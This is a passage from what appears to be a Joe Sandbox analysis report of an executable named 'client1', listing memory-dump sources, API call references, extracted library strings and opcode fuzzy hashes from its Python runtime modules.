                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: StringUnicode_$DeallocDict_ErrorFromItemWith
                                                    • String ID:
                                                    • API String ID: 2891578892-0
                                                    • Opcode ID: 44fa7e439cacf85886ffa34363105531bee131cff24c458678a7dc907af3b5a9
                                                    • Instruction ID: 85524c304db23abe56b5eb5ee10f8ae7e81ed780a90438840eda3b2e61e28d09
                                                    • Opcode Fuzzy Hash: 44fa7e439cacf85886ffa34363105531bee131cff24c458678a7dc907af3b5a9
                                                    • Instruction Fuzzy Hash: A9015E61B0BB82C1EA168F26E90833A66E8AB48F90F049075DD6D07B54DF3DD0478710
                                                    APIs
                                                    • memset.VCRUNTIME140(?,?,?,00007FFBAA6F3BC2,?,?,?,00007FFBAA6F3A6E), ref: 00007FFBAA6F3EC4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: VUUUUUUU$sNaN
                                                    • API String ID: 2221118986-2264336794
                                                    • Opcode ID: 5b83c14853345eac1045005ced30942e50ff53a4e18e0f424a491d81edf0acd5
                                                    • Instruction ID: deadcef6b79e65a7d7e5eb84a6338923da2d78481ee47ec98e519ed5e8f99cee
                                                    • Opcode Fuzzy Hash: 5b83c14853345eac1045005ced30942e50ff53a4e18e0f424a491d81edf0acd5
                                                    • Instruction Fuzzy Hash: AE91D6E1A0FA86C5EB1B8E29D81437D6698AF51F90F149072DE6D073D5DE2CE44BC720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                    • API String ID: 3215553584-1196891531
                                                    • Opcode ID: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                    • Instruction ID: 1542419fdd7386e72493200d0f49359441f601781debbe21f9e69f7a4f0e499c
                                                    • Opcode Fuzzy Hash: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                    • Instruction Fuzzy Hash: EC81C731D2C38285F7787E3D89402F8B69AAF11B48FD58035DA2D9B286CFBDE4059361
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                    • Instruction ID: a7dcd6674dd98766165323c66a314b684f0f5cf4b64d6333bf91d0467ab5d1a8
                                                    • Opcode Fuzzy Hash: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                    • Instruction Fuzzy Hash: 90617C32A08B858AE720AF75D8803EDB7A5FB54B88F544235EE9D57B98CF38E045C711
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                    • Instruction ID: 89e6ea3a9b9764ae6a7bd996ea31cba2f5743fa1988ae6ff5b57a3f20f2b1cbe
                                                    • Opcode Fuzzy Hash: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                    • Instruction Fuzzy Hash: 1151B3329087C286DB74AF2199402E8B7AAFB64B94F944135DAAC87BD5CF3CE450C712
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Dict_Item
                                                    • String ID: <module>
                                                    • API String ID: 4198653253-217463007
                                                    • Opcode ID: 8be56f128c2966085a7436ac026dcbec3df9314bf8f7f933ed1dcba84a15d0ed
                                                    • Instruction ID: edc5a91d1b1e633fdd5ce01cfa6064e4e7749f4267664afe858a007c9ad92399
                                                    • Opcode Fuzzy Hash: 8be56f128c2966085a7436ac026dcbec3df9314bf8f7f933ed1dcba84a15d0ed
                                                    • Instruction Fuzzy Hash: 1641B8B650AF9181E6268F26F8402A97778FB44B94F00853ADEAE43774DF3CE461C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 1878133881-2410924014
                                                    • Opcode ID: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                    • Instruction ID: 5e41e6416dcbca17ebcc084aa2b1602857236b40ea0d1787d6511593137c4f44
                                                    • Opcode Fuzzy Hash: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                    • Instruction Fuzzy Hash: C83174726287C191EA30BB20E4517DAA36AFB84784FC04035EA9D47A89DF3CD305CB50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: __init__$charset_normalizer.md.SuspiciousDuplicateAccentPlugin$interpreted classes cannot inherit from compiled
                                                    • API String ID: 1450464846-1506521901
                                                    • Opcode ID: 4f9607bb26152d36a62855f69e1e92066554209e4990823762cc37e355d07849
                                                    • Instruction ID: 30b11fc59b1c4b6b362b453da15576213fc9ceaa152e58077c9b61502eb3a53a
                                                    • Opcode Fuzzy Hash: 4f9607bb26152d36a62855f69e1e92066554209e4990823762cc37e355d07849
                                                    • Instruction Fuzzy Hash: A53129B1A0AB4281EB128F2AF88036963B0FB48B88F54853ADE6D47779DF7DD555C340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FormatFromUnicode_
                                                    • String ID: False$True${<class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s, <class '%s'>:%s}
                                                    • API String ID: 3889672380-2743431446
                                                    • Opcode ID: f995eacbdabc04b11ee8721ccd51a25ac2d833d40258d5847d7302674445f47e
                                                    • Instruction ID: edb17be57e35cb003f940e5b7c244a19c71dd714be687af9a3e24194c8e4fd89
                                                    • Opcode Fuzzy Hash: f995eacbdabc04b11ee8721ccd51a25ac2d833d40258d5847d7302674445f47e
                                                    • Instruction Fuzzy Hash: 6A318276A06F45C9EB518F69E88039E77B8F748B98F500126DE8C57B28EF38D155CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_DeallocErr_KeywordsParseStringTuple
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 2394110584-3732962867
                                                    • Opcode ID: 46243e6063ea57f9d7b5eaf9eaf3c720bc946233cb08bfc47c4f57a2e7e05993
                                                    • Instruction ID: 4847db217590924527bd5b531148ff2cb35b5de60ee0270390a91ae2763ffacf
                                                    • Opcode Fuzzy Hash: 46243e6063ea57f9d7b5eaf9eaf3c720bc946233cb08bfc47c4f57a2e7e05993
                                                    • Instruction Fuzzy Hash: DF2125A1A0AA07D0EA028F35E8801BB77ACAF44B90F5044B2CD4E56BB4DE6DE147C325
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_String
                                                    • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_last_printable_char' cannot be deleted$str or None
                                                    • API String ID: 1259552197-2331204894
                                                    • Opcode ID: 32e75a776e48ac4c2c5fe5fe0fb0a9e3155ffe328c8c67ac2beb131072333536
                                                    • Instruction ID: 7449ef21b9bb4f44b0aa8623d36039b659a5faf730ddef68fda87215b6812d92
                                                    • Opcode Fuzzy Hash: 32e75a776e48ac4c2c5fe5fe0fb0a9e3155ffe328c8c67ac2beb131072333536
                                                    • Instruction Fuzzy Hash: EE1191B2B1AA4682EE46CF3AE59023C6360FB44B94F58C135DE2D077B5DE2CE4918340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_String
                                                    • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_last_latin_character' cannot be deleted$str or None
                                                    • API String ID: 1259552197-4111674009
                                                    • Opcode ID: 8e765b0d61acfcd8c10934ee4906ef0f2b2d39b6f7c7e18e8a84478dcf422f92
                                                    • Instruction ID: 979b1245878dff33a123b0e8c9140c2efc348ad4518b65cc98064d5f1fd274fb
                                                    • Opcode Fuzzy Hash: 8e765b0d61acfcd8c10934ee4906ef0f2b2d39b6f7c7e18e8a84478dcf422f92
                                                    • Instruction Fuzzy Hash: 23118FB2B1AA0681FF52CB2AE5D023C6360EB88B94F488135DE3D077A4DE3CD4908300
                                                    APIs
                                                    Strings
                                                    • Context(prec=%zd, rounding=%s, Emin=%zd, Emax=%zd, capitals=%d, clamp=%d, flags=%s, traps=%s), xrefs: 00007FFBAA70FC98
                                                    • internal error in context_repr, xrefs: 00007FFBAA716EB7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_FormatFromStringUnicode_
                                                    • String ID: Context(prec=%zd, rounding=%s, Emin=%zd, Emax=%zd, capitals=%d, clamp=%d, flags=%s, traps=%s)$internal error in context_repr
                                                    • API String ID: 1884982852-1630598095
                                                    • Opcode ID: c032508e1638e32cb860f0bf575b5598efde2c1b5a4c2d8c493699452706a803
                                                    • Instruction ID: d5ea252273756559ae58c9b4e30c63f593e9fe0a25640134b99f23b97c7322a9
                                                    • Opcode Fuzzy Hash: c032508e1638e32cb860f0bf575b5598efde2c1b5a4c2d8c493699452706a803
                                                    • Instruction Fuzzy Hash: 2B21F9B2609A42D6DB22CF31E4906AB77A8FB88B54F100572DE4D47764DE3DE04ACB60
                                                    APIs
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAB4A0CB9
                                                      • Part of subcall function 00007FFBAB494540: PyObject_GetAttr.PYTHON311 ref: 00007FFBAB494566
                                                      • Part of subcall function 00007FFBAB494540: PyUnicode_FromFormat.PYTHON311 ref: 00007FFBAB494585
                                                      • Part of subcall function 00007FFBAB494540: PyObject_GetItem.PYTHON311 ref: 00007FFBAB494599
                                                      • Part of subcall function 00007FFBAB494540: _Py_Dealloc.PYTHON311 ref: 00007FFBAB4945AB
                                                      • Part of subcall function 00007FFBAB494540: PyErr_Clear.PYTHON311 ref: 00007FFBAB4945B6
                                                      • Part of subcall function 00007FFBAB494540: PyModule_GetFilenameObject.PYTHON311 ref: 00007FFBAB4945BF
                                                      • Part of subcall function 00007FFBAB494540: PyUnicode_FromFormat.PYTHON311 ref: 00007FFBAB4945D8
                                                      • Part of subcall function 00007FFBAB494540: PyErr_SetImportError.PYTHON311 ref: 00007FFBAB4945EA
                                                      • Part of subcall function 00007FFBAB494540: _Py_Dealloc.PYTHON311 ref: 00007FFBAB4945F9
                                                      • Part of subcall function 00007FFBAB494540: _Py_Dealloc.PYTHON311 ref: 00007FFBAB494608
                                                    • PyDict_SetItem.PYTHON311 ref: 00007FFBAB4A0D06
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAB4A0D1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Err_FormatFromItemObject_Unicode_$AttrClearDict_ErrorFilenameImportModule_Object
                                                    • String ID: <module>
                                                    • API String ID: 3933568714-217463007
                                                    • Opcode ID: 7b13a31264b79e89851a6d61d6372347fd4847a0b1f1e490f03075708453d135
                                                    • Instruction ID: 7dcf948ea690ccf52950525a6d122830edb6aafe18155625304e36526d718d67
                                                    • Opcode Fuzzy Hash: 7b13a31264b79e89851a6d61d6372347fd4847a0b1f1e490f03075708453d135
                                                    • Instruction Fuzzy Hash: 081127E6A0BA0644FA179F77F8902782660AF14BD0F04D03ECD2E063B0EE3CF0918240
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_FormatMethodObject_Vectorcall
                                                    • String ID: bool$eligible
                                                    • API String ID: 2503426208-3320767611
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: DeallocErr_FormatMethodObject_Vectorcall
                                                    • String ID: bool$eligible
                                                    • API String ID: 2503426208-3320767611
                                                    APIs
                                                    • PyErr_SetString.PYTHON311(?,?,?,?,?,00007FFBAA731EDC), ref: 00007FFBAA733B6F
                                                      • Part of subcall function 00007FFBAA731FD0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA732008
                                                      • Part of subcall function 00007FFBAA731FD0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA732026
                                                    • PyErr_Format.PYTHON311 ref: 00007FFBAA731F53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Similarity
                                                    • API ID: Err_strncmp$FormatString
                                                    • String ID: name too long$undefined character name '%s'
                                                    • API String ID: 3882229318-4056717002
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,00007FF79F623699), ref: 00007FF79F623BD1
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: ErrorFileLastMessageModuleName
                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                    • API String ID: 2581892565-1977442011
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: CompareStringUnicode_With
                                                    • String ID: flags$traps
                                                    • API String ID: 3588640018-2868145861
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: DeallocImportImport_List_
                                                    • String ID: <module>
                                                    • API String ID: 2210235416-217463007
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Err_$Long_OccurredSsize_tString
                                                    • String ID: valid values for clamp are 0 or 1
                                                    • API String ID: 2426478915-2125878968
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: DeallocDict_ItemPackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4228545439-217463007
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: DeallocDict_ItemPackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4228545439-217463007
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: DeallocDict_ItemPackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4228545439-217463007
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    APIs
                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF79F63C41B), ref: 00007FF79F63C54C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF79F63C41B), ref: 00007FF79F63C5D7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Similarity
                                                    • API ID: strncmp
                                                    • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                    • API String ID: 1114863663-87138338
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: _get_daylight$_isindst
                                                    • String ID:
                                                    • API String ID: 4170891091-0
                                                    • Opcode ID: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                    • Instruction ID: 3e9ed73f2e8261dce19645282c8f43f150ae992c41bc12e35cf438408835576f
                                                    • Opcode Fuzzy Hash: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                    • Instruction Fuzzy Hash: 84512972F047918AFB34EF7498412FCA7AABB10358F944235ED2E52AD5DB3CA406C720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                    • String ID:
                                                    • API String ID: 2780335769-0
                                                    • Opcode ID: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                    • Instruction ID: da029fc5d351682b408e8feb9d914ebf8abeb788ae687c28d879cfc1d896197f
                                                    • Opcode Fuzzy Hash: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                    • Instruction Fuzzy Hash: 83516D23E087818AFB20EF71D4503FDB7AAAB48B98FA44135DE2D57699DF78D4418720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$BoolCompareObject_Rich
                                                    • String ID:
                                                    • API String ID: 74976934-0
                                                    • Opcode ID: cdd2b6bcb2e944d73ca2653c866df25a3401dd1b17aa824d013412721f36fff1
                                                    • Instruction ID: 9b0428594cd61e4f14eec74c57e46cfe3d5443cf193fd5061bf743b7e4e53353
                                                    • Opcode Fuzzy Hash: cdd2b6bcb2e944d73ca2653c866df25a3401dd1b17aa824d013412721f36fff1
                                                    • Instruction Fuzzy Hash: C31182B2E1A90281EA568B3AE5942BD6360AF55FF0F099334DE7A066F5DF2CD8954300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$DialogInvalidateRect
                                                    • String ID:
                                                    • API String ID: 1956198572-0
                                                    • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                    • Instruction ID: d3e74ef10bdee7ac3501ca7d7d83abf59f251e85485275c8c19478c86165f97c
                                                    • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                    • Instruction Fuzzy Hash: 5711EC21E1C3C241FA71BB79E9442F99297EF89790FC44030E96947B8DDE2CD5C14111
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: List_$Append$Dealloc
                                                    • String ID:
                                                    • API String ID: 3059130597-0
                                                    • Opcode ID: e5df2cfc70ad144d1460cb09aabecadf3178bc0b40c32a179bdd187bc4104b75
                                                    • Instruction ID: b0e1fbe7a7e2c9ffc2380d09290e2b22dd0aa26f094a78da68203136a3e013c9
                                                    • Opcode Fuzzy Hash: e5df2cfc70ad144d1460cb09aabecadf3178bc0b40c32a179bdd187bc4104b75
                                                    • Instruction Fuzzy Hash: 5A212EA1E0E702D1EB668F32E54033B66E9AF04B94F5450B7EE0D52298DF3CF596C220
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
